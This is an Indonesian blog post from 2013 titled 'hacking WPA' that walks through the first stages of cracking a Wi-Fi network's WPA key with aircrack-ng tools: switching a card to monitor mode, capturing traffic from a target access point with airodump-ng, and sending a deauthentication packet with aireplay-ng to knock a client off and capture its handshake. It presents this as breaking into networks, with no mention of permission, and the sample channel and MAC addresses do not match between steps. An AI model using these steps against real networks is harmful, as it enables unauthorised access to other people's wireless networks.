Kamis, 29 Agustus 2013

hacking WPA

Menjebol WPA hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya. 

Misalnya,
 
BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2

 
Untuk memudahkan operasi ada baiknya melakukan di shell
 
export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
 
airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut
 
Interface Chipset  Driver
wlan0  Intel 3945ABG iwl3945 - [phy0]
    (monitor mode enabled on mon0)
 
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
Jalankan airodump di WLAN mon0
 
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
 
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
 
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Dimana
 
-a MAC AP
-c MAC client

Tidak ada komentar:

Posting Komentar